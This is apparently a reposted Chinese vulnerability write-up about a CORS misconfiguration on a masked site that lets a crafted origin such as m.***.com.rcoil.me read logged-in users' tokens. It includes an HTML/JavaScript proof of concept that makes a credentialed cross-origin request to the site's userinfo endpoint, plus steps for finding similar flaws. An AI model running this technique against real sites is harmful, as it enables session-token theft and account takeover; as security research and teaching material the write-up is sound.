zoukankan      html  css  js  c++  java
  • cors劫持用户凭证任意登陆

    漏洞作者:rcoil

    挖洞过程无意中看到一个数据包,响应包中包含有Access-Control-Allow-Origin这个字段,然后就随手尝试看看有没有CORS漏洞!结果如图

    再尝试 发现如下图!

    发现后面再加上域名是可以跨域获取资源的

    如何利用?

    利用方式就是泛解析,将http://m.****.com.rcoil.me解析到我们的IP上,由于比较穷买不起域名,就本地搭了个DNS设置了泛解析,如下图

    只要是*.rcoil.me都会解析到我们的本地这

    POC如下:

    <!DOCTYPE html>
    <html>
    <body>
    <center>
    <h2>CORS POC Exploit</h2>
    <h3>Extract SID</h3>
     
    <div id="demo">
    <button type="button" onclick="cors()">Exploit</button>
    </div>
     
    <script>
    function cors() {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
          document.getElementById("demo").innerHTML = alert(this.responseText);
        }
      };
      xhttp.open("GET", "http://m.***.com/activity/juejiapi/editor/userinfo", true);
      xhttp.withCredentials = true;
      xhttp.send();
    }
    </script>
     
    </body>
    </html>
    

    而拿到的TOKEN又能干嘛呢,如图

    总结:
    第1步、观察CORS是否可以可控
    第2步、如果可控的话寻找账户登陆的唯一凭证
    第3步、然后在观察凭证是否可劫持

  • 相关阅读:
    作业呢
    留言板
    题解 lg2480 古代猪文
    题解 lg4139 上帝与集合的正确用法
    AFO
    题解 lg2946 [USACO09MAR]Cow Frisbee Team S
    题解 lg4158 [SCOI2009]粉刷匠
    题解 HDU4035 Maze
    题解 lg3232 [HNOI2013]游走
    题解 HDU4652 Dice
  • 原文地址:https://www.cnblogs.com/zpchcbd/p/11891863.html
Copyright © 2011-2022 走看看